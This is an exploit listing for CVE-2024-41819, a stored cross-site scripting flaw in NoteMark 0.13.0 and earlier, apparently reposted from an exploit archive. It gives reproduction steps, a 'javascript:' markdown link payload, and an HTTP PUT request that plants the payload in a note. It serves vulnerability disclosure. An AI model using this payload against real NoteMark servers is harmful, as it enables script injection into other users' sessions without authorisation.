Exploit for Notemark 0.13.0 Cross Site Scripting CVE-2024-41819

Name: Exploit for Notemark 0.13.0 Cross Site Scripting CVE-2024-41819
Rating: 5 (108 reviews)

2024-08-29 | CVSS 8.7

## https://sploitus.com/exploit?id=PACKETSTORM:180456
# Exploit Title: Stored XSS in NoteMark  
# Date: 07/29/2024  
# Exploit Author: Alessio Romano (sfoffo)  
# Vendor Homepage: https://notemark.docs.enchantedcode.co.uk/  
# Version: 0.13.0 and below  
# Tested on: Linux  
# References:  
https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-41819,  
https://github.com/enchant97/note-mark/commit/a0997facb82f85bfb8c0d497606d89e7d150e182,  
https://github.com/enchant97/note-mark/security/advisories/GHSA-rm48-9mqf-8jc3  
# CVE: CVE-2024-41819  
  
## Steps to Reproduce  
1. Log in to the application.  
2. Create a new note or enter a previously created note.  
3. Access the note editor functionality from the selected note by clicking  
on the "Editor" tab.  
4. Input the following payload:  
[xss-link](javascript:alert(1))  
5. Save the changes.  
6. Click on the "Rendered" tab to view the rendered markdown version of the  
note. Click on the previously created link to pop the injected alert.  
  
## HTTP Request PoC  
  
PUT /api/notes/<note-uuid>/content HTTP/1.1  
Host: localhost:8000  
Accept: */*  
Content-Type: text/plain;charset=UTF-8  
Content-Length: 34  
Sec-Fetch-Site: same-origin  
Authorization: Bearer <TOKEN>  
  
  
[xss-link](javascript:alert(1))